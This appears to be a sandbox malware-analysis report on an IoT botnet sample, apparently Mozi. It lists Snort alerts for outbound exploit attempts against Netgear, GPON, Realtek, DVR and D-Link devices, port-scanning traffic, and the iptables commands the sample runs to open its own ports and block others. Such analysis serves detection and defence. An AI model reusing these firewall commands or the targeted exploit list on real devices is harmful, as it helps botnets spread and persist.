                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:50064 -> 107.20.106.251:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:50064 -> 107.20.106.251:80
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.20:52998 -> 116.206.55.142:52869
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:35196 -> 104.115.250.114:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:35196 -> 104.115.250.114:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.115.250.114:80 -> 192.168.2.20:35196
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 129.16.2.234: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.152.114.5: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 168.95.157.5: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.59.216.67: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.95.78.148: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:47542 -> 45.196.102.179:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:47542 -> 45.196.102.179:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.150.96.14: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.165.182.127: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:37970 -> 175.252.8.184:8080
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:37970 -> 175.252.8.184:8080
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 211.227.96.15:57445 -> 192.168.2.20:14165
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 134.97.128.247: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.37.130.69: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:42922 -> 23.96.36.243:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:42922 -> 23.96.36.243:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.218.155.42: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.155.180.12: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 4.16.0.234: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 193.203.0.195: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:44286 -> 34.117.168.156:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:51602 -> 104.98.58.115:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:51602 -> 104.98.58.115:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.98.58.115:80 -> 192.168.2.20:51602
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:47394 -> 15.206.172.134:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:47394 -> 15.206.172.134:80
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 107.164.203.92: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.218.46.16:80 -> 192.168.2.20:60196
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60196 -> 23.218.46.16:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.192.4.224: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:60130 -> 99.61.64.177:8080
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:60130 -> 99.61.64.177:8080
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.210.243.211: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 217.196.225.4: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.215.105.193: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.92.141.24: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 187.18.116.82: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 216.221.97.226: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 203.116.7.190: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:44974 -> 192.155.170.244:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:44974 -> 192.155.170.244:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.148.141.21: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:57262 -> 51.178.69.101:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:53646 -> 184.31.173.81:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:53236 -> 66.201.89.13:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:53236 -> 66.201.89.13:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:53646 -> 184.31.173.81:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.31.173.81:80 -> 192.168.2.20:53646
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.227.19.236: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.218.148.138:80 -> 192.168.2.20:46816
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:46816 -> 23.218.148.138:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59382 -> 45.195.180.141:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59382 -> 45.195.180.141:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:55652 -> 38.87.83.34:80
                Connects to many ports of the same IP (likely port scanning)Show sources
                Source: global trafficTCP traffic: 133.162.173.63 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 112.127.196.238 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 43.143.2.136 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 197.181.82.192 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 146.149.143.40 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 109.196.110.179 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 50.74.153.237 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 141.145.10.198 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 7.39.247.208 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 11.90.50.158 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 182.104.216.147 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 103.36.247.14 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 72.80.79.250 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 195.12.213.244 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 11.229.75.234 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 162.68.221.250 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 16.65.75.160 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 82.24.32.9 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 20.162.77.171 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 1.30.247.172 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 53.96.67.14 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 200.240.85.208 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 54.24.9.195 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 39.174.77.150 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 86.99.33.243 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 220.149.177.74 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 168.246.111.26 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 36.138.107.187 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 81.141.9.101 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 36.77.151.76 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 220.248.226.183 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 186.119.243.90 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 183.132.135.144 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 82.65.114.102 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 206.186.242.243 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 68.124.102.212 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 108.77.7.163 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 149.189.159.233 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 139.220.80.168 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 182.157.115.73 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 89.4.36.102 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 29.202.233.5 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 121.189.109.57 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 214.108.114.69 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 111.83.52.99 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 108.73.168.86 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 11.202.4.51 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 158.202.85.201 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 108.86.208.185 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 218.184.12.7 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 182.58.239.246 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 123.237.248.195 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 49.44.95.153 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 86.150.240.234 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 14.134.169.239 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 189.5.233.211 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 41.206.221.126 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 174.252.187.249 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 38.24.144.193 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 24.29.191.22 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 122.246.229.135 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 93.175.160.79 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 180.194.184.80 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 14.73.117.144 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 201.84.237.163 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 180.56.86.107 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 208.202.72.240 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 1.212.26.57 ports 2,5,6,8,9,52869
                Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
                Source: /bin/sh (PID: 4618)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4652)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4655)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4699)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4708)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4736)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4742)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4761)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4877)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4880)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4883)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4892)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4950)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4985)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 5011)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5014)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5019)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5044)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5079)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5105)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5121)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5144)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5152)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5183)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5201)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5204)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5207)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5211)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5232)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5268)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5303)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5333)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
                Uses known network protocols on non-standard portsShow sources
                Source: unknownNetwork traffic detected: HTTP traffic on port 34926 -> 49152
                Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 34926
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40718 -> 8443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: global trafficTCP traffic: 192.168.2.20:53930 -> 162.234.162.7:8080
                Source: global trafficTCP traffic: 192.168.2.20:32874 -> 49.44.95.153:37215
                Source: global trafficTCP traffic: 192.168.2.20:45040 -> 155.152.8.152:5555
                Source: global trafficTCP traffic: 192.168.2.20:54864 -> 214.112.173.213:8080
                Source: global trafficTCP traffic: 192.168.2.20:41280 -> 206.186.242.243:52869
                Source: global trafficTCP traffic: 192.168.2.20:38186 -> 201.254.11.90:8443
                Source: global trafficTCP traffic: 192.168.2.20:39510 -> 120.148.200.141:8080
                Source: global trafficTCP traffic: 192.168.2.20:40668 -> 182.58.239.246:49152
                Source: global trafficTCP traffic: 192.168.2.20:46862 -> 68.124.102.212:52869
                Source: global trafficTCP traffic: 192.168.2.20:44208 -> 94.194.209.135:7574
                Source: global trafficTCP traffic: 192.168.2.20:52130 -> 11.202.4.51:37215
                Source: global trafficTCP traffic: 192.168.2.20:51644 -> 198.228.200.241:5555
                Source: global trafficTCP traffic: 192.168.2.20:46806 -> 24.29.191.22:52869
                Source: global trafficTCP traffic: 192.168.2.20:35266 -> 35.119.229.43:8080
                Source: global trafficTCP traffic: 192.168.2.20:33912 -> 121.130.73.42:8080
                Source: global trafficTCP traffic: 192.168.2.20:46234 -> 186.54.121.35:5555
                Source: global trafficTCP traffic: 192.168.2.20:58224 -> 190.127.144.31:7574
                Source: global trafficTCP traffic: 192.168.2.20:52814 -> 128.70.68.149:7574
                Source: global trafficTCP traffic: 192.168.2.20:44062 -> 76.44.19.56:8080
                Source: global trafficTCP traffic: 192.168.2.20:53710 -> 131.221.67.66:5555
                Source: global trafficTCP traffic: 192.168.2.20:38362 -> 26.221.252.159:8080
                Source: global trafficTCP traffic: 192.168.2.20:47266 -> 218.184.12.7:52869
                Source: global trafficTCP traffic: 192.168.2.20:55354 -> 98.38.174.140:8443
                Source: global trafficTCP traffic: 192.168.2.20:59778 -> 57.122.76.123:8443
                Source: global trafficTCP traffic: 192.168.2.20:44380 -> 153.254.249.142:8080
                Source: global trafficTCP traffic: 192.168.2.20:38056 -> 75.81.234.138:81
                Source: global trafficTCP traffic: 192.168.2.20:57728 -> 205.200.160.114:5555
                Source: global trafficTCP traffic: 192.168.2.20:43516 -> 82.24.32.9:49152
                Source: global trafficTCP traffic: 192.168.2.20:42884 -> 195.12.213.244:49152
                Source: global trafficTCP traffic: 192.168.2.20:49038 -> 3.210.135.11:7574
                Source: global trafficTCP traffic: 192.168.2.20:52316 -> 162.110.153.1:81
                Source: global trafficTCP traffic: 192.168.2.20:33986 -> 120.94.211.11:81
                Source: global trafficTCP traffic: 192.168.2.20:37130 -> 137.170.59.38:8080
                Source: global trafficTCP traffic: 192.168.2.20:39206 -> 81.4.149.202:81
                Source: global trafficTCP traffic: 192.168.2.20:60310 -> 23.238.107.169:8080
                Source: global trafficTCP traffic: 192.168.2.20:40898 -> 171.254.103.135:8443
                Source: global trafficTCP traffic: 192.168.2.20:48228 -> 7.39.247.208:37215
                Source: global trafficTCP traffic: 192.168.2.20:54230 -> 125.223.44.138:8080
                Source: global trafficTCP traffic: 192.168.2.20:34912 -> 146.247.28.72:81
                Source: global trafficTCP traffic: 192.168.2.20:60270 -> 38.24.144.193:52869
                Source: global trafficTCP traffic: 192.168.2.20:38266 -> 81.141.9.101:49152
                Source: global trafficTCP traffic: 192.168.2.20:33558 -> 175.250.213.121:81
                Source: global trafficTCP traffic: 192.168.2.20:48800 -> 145.144.180.237:7574
                Source: global trafficTCP traffic: 192.168.2.20:39344 -> 153.76.243.35:5555
                Source: global trafficTCP traffic: 192.168.2.20:34490 -> 18.106.206.85:8080
                Source: global trafficTCP traffic: 192.168.2.20:42070 -> 134.169.30.105:8080
                Source: global trafficTCP traffic: 192.168.2.20:34706 -> 19.144.174.109:7574
                Source: global trafficTCP traffic: 192.168.2.20:37906 -> 82.65.114.102:37215
                Source: global trafficTCP traffic: 192.168.2.20:48466 -> 106.15.186.130:81
                Source: global trafficTCP traffic: 192.168.2.20:57956 -> 139.119.181.153:8080
                Source: global trafficTCP traffic: 192.168.2.20:59544 -> 216.76.72.47:8080
                Source: global trafficTCP traffic: 192.168.2.20:46178 -> 86.99.33.243:52869
                Source: global trafficTCP traffic: 192.168.2.20:43980 -> 63.159.4.132:8443
                Source: global trafficTCP traffic: 192.168.2.20:46258 -> 220.248.226.183:37215
                Source: global trafficTCP traffic: 192.168.2.20:55804 -> 26.194.71.217:8080
                Source: global trafficTCP traffic: 192.168.2.20:53546 -> 220.149.177.74:49152
                Source: global trafficTCP traffic: 192.168.2.20:53472 -> 105.66.122.27:8080
                Source: global trafficTCP traffic: 192.168.2.20:38196 -> 89.235.112.28:8080
                Source: global trafficTCP traffic: 192.168.2.20:59376 -> 29.135.222.49:5555
                Source: global trafficTCP traffic: 192.168.2.20:49524 -> 208.202.72.240:49152
                Source: global trafficTCP traffic: 192.168.2.20:41642 -> 165.172.98.68:8080
                Source: global trafficTCP traffic: 192.168.2.20:54830 -> 53.96.67.14:37215
                Source: global trafficTCP traffic: 192.168.2.20:47544 -> 133.162.173.63:49152
                Source: global trafficTCP traffic: 192.168.2.20:33566 -> 215.146.210.187:8080
                Source: global trafficTCP traffic: 192.168.2.20:37786 -> 141.205.147.62:8443
                Source: global trafficTCP traffic: 192.168.2.20:34070 -> 41.206.221.126:37215
                Source: global trafficTCP traffic: 192.168.2.20:44146 -> 213.246.220.122:81
                Source: global trafficTCP traffic: 192.168.2.20:58358 -> 214.101.231.205:81
                Source: global trafficTCP traffic: 192.168.2.20:50404 -> 195.47.32.35:8080
                Source: global trafficTCP traffic: 192.168.2.20:38920 -> 206.85.0.219:8080
                Source: global trafficTCP traffic: 192.168.2.20:51488 -> 193.139.114.52:8080
                Source: global trafficTCP traffic: 192.168.2.20:38382 -> 21.39.93.98:8443
                Source: global trafficTCP traffic: 192.168.2.20:51278 -> 50.74.153.237:52869
                Source: global trafficTCP traffic: 192.168.2.20:45418 -> 219.2.155.95:5555
                Source: global trafficTCP traffic: 192.168.2.20:46712 -> 20.162.94.18:7574
                Source: global trafficTCP traffic: 192.168.2.20:43384 -> 188.213.189.127:8080
                Source: global trafficTCP traffic: 192.168.2.20:39208 -> 189.5.233.211:52869
                Source: global trafficTCP traffic: 192.168.2.20:38928 -> 14.134.169.239:37215
                Source: global trafficTCP traffic: 192.168.2.20:50198 -> 205.163.228.224:8080
                Source: global trafficTCP traffic: 192.168.2.20:57468 -> 180.194.184.80:37215
                Source: global trafficTCP traffic: 192.168.2.20:47588 -> 46.184.71.253:81
                Source: global trafficTCP traffic: 192.168.2.20:57734 -> 166.226.181.7:81
                Source: global trafficTCP traffic: 192.168.2.20:38664 -> 11.49.92.66:5555
                Source: global trafficTCP traffic: 192.168.2.20:40490 -> 218.130.134.16:81
                Source: global trafficTCP traffic: 192.168.2.20:54756 -> 37.137.249.121:7574
                Source: global trafficTCP traffic: 192.168.2.20:43198 -> 72.80.79.250:52869
                Source: global trafficTCP traffic: 192.168.2.20:56426 -> 201.84.237.163:52869
                Source: global trafficTCP traffic: 192.168.2.20:55458 -> 20.162.77.171:37215
                Source: global trafficTCP traffic: 192.168.2.20:35700 -> 146.179.187.237:5555
                Source: global trafficTCP traffic: 192.168.2.20:33184 -> 1.212.26.57:52869
                Source: global trafficTCP traffic: 192.168.2.20:52734 -> 43.26.128.77:8080
                Source: global trafficTCP traffic: 192.168.2.20:53056 -> 183.59.13.157:8080
                Source: global trafficTCP traffic: 192.168.2.20:58196 -> 185.217.113.203:81
                Source: global trafficTCP traffic: 192.168.2.20:47214 -> 180.56.86.107:52869
                Source: global trafficTCP traffic: 192.168.2.20:50330 -> 158.202.85.201:52869
                Source: global trafficTCP traffic: 192.168.2.20:38764 -> 11.25.85.171:5555
                Source: global trafficTCP traffic: 192.168.2.20:40872 -> 123.154.185.48:81
                Source: global trafficTCP traffic: 192.168.2.20:58848 -> 106.38.123.170:81
                Source: global trafficTCP traffic: 192.168.2.20:57094 -> 55.5.67.170:7574
                Source: global trafficTCP traffic: 192.168.2.20:50086 -> 111.83.52.99:52869
                Source: global trafficTCP traffic: 192.168.2.20:43996 -> 209.98.175.169:8080
                Source: global trafficTCP traffic: 192.168.2.20:37214 -> 181.240.28.129:8443
                Source: global trafficTCP traffic: 192.168.2.20:49382 -> 112.127.196.238:52869
                Source: global trafficTCP traffic: 192.168.2.20:36522 -> 176.84.199.60:7574
                Source: global trafficTCP traffic: 192.168.2.20:54392 -> 220.240.27.125:81
                Source: global trafficTCP traffic: 192.168.2.20:47752 -> 44.95.144.199:8443
                Source: global trafficTCP traffic: 192.168.2.20:43164 -> 57.180.231.50:8080
                Source: global trafficTCP traffic: 192.168.2.20:51576 -> 162.68.221.250:49152
                Source: global trafficTCP traffic: 192.168.2.20:55320 -> 151.229.10.158:81
                Source: global trafficTCP traffic: 192.168.2.20:36522 -> 186.130.183.158:81
                Source: global trafficTCP traffic: 192.168.2.20:41408 -> 200.95.128.253:5555
                Source: global trafficTCP traffic: 192.168.2.20:43614 -> 84.154.75.217:8080
                Source: global trafficTCP traffic: 192.168.2.20:49044 -> 110.105.102.228:8443
                Source: global trafficTCP traffic: 192.168.2.20:38892 -> 54.24.9.195:37215
                Source: global trafficTCP traffic: 192.168.2.20:43904 -> 41.201.36.195:81
                Source: global trafficTCP traffic: 192.168.2.20:59424 -> 11.90.50.158:52869
                Source: global trafficTCP traffic: 192.168.2.20:35034 -> 136.156.51.131:8080
                Source: global trafficTCP traffic: 192.168.2.20:43350 -> 144.192.99.206:8443
                Source: global trafficTCP traffic: 192.168.2.20:43478 -> 222.236.93.57:8443
                Source: global trafficTCP traffic: 192.168.2.20:41992 -> 83.163.237.112:49152
                Source: global trafficTCP traffic: 192.168.2.20:40334 -> 4.249.179.26:5555
                Source: global trafficTCP traffic: 192.168.2.20:59764 -> 97.66.52.185:5555
